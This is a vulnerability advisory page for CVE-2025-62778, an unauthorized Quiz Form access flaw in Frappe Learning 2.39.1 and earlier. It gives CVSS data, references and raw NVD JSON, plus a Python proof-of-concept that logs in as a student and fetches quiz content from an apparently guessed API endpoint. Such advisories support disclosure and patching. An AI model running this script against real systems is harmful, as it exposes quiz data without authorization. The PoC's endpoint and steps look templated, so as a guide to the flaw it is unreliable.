CVE-2025-62778

Description

Frappe Learning is a learning management system. A security issue was identified in Frappe Learning 2.39.1 and earlier, where students were able to access the Quiz Form if they had the URL.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:* - VULNERABLE

Frappe Learning <= 2.39.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # CVE-2025-62778 PoC - Frappe Learning Quiz Form Unauthorized Access # Target: Frappe Learning <= 2.39.1 TARGET_URL = "http://target-site.com" # Replace with actual quiz URL obtained through enumeration or information disclosure QUIZ_URL = f"{TARGET_URL}/api/method/learning_website.quiz.get_quiz?quiz_id=YOUR_QUIZ_ID" def exploit_unauthorized_quiz_access(): """ This PoC demonstrates the unauthorized access to Quiz Form. Steps: 1. Obtain a valid session cookie (student account) 2. Access the Quiz Form URL directly without completing prerequisites 3. Retrieve quiz questions and answers """ session = requests.Session() # Step 1: Login as a student (any authenticated user) login_url = f"{TARGET_URL}/api/method/login" login_data = { "usr": "[email protected]", "pwd": "password123" } session.post(login_url, json=login_data) # Step 2: Directly access Quiz Form without meeting prerequisites headers = { "X-Frappe-CSRF-Token": session.cookies.get("csrf_token") or "" } # Step 3: Retrieve quiz content directly via URL response = session.get(QUIZ_URL, headers=headers) if response.status_code == 200: print("[+] Successfully accessed Quiz Form without authorization!") print(f"[+] Quiz Content: {response.json()}") return True else: print(f"[-] Access failed: {response.status_code}") return False if __name__ == "__main__": exploit_unauthorized_quiz_access()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62778
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62778
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62778/
[4] VulDB https://vuldb.com/cve/CVE-2025-62778
[5] https://github.com/frappe/lms/commit/8749e21744547ae32f729bde05c854113e126750
[6] https://github.com/frappe/lms/security/advisories/GHSA-8xvv-6v89-xxgx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62778", "sourceIdentifier": "[email protected]", "published": "2025-10-27T22:15:41.873", "lastModified": "2025-11-03T18:40:23.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe Learning is a learning management system. A security issue was identified in Frappe Learning 2.39.1 and earlier, where students were able to access the Quiz Form if they had the URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.39.2", "matchCriteriaId": "580D26BD-0E38-4F97-A5B7-E2047F6F5E8D"}]}]}], "references": [{"url": "https://github.com/frappe/lms/commit/8749e21744547ae32f729bde05c854113e126750", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/frappe/lms/security/advisories/GHSA-8xvv-6v89-xxgx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}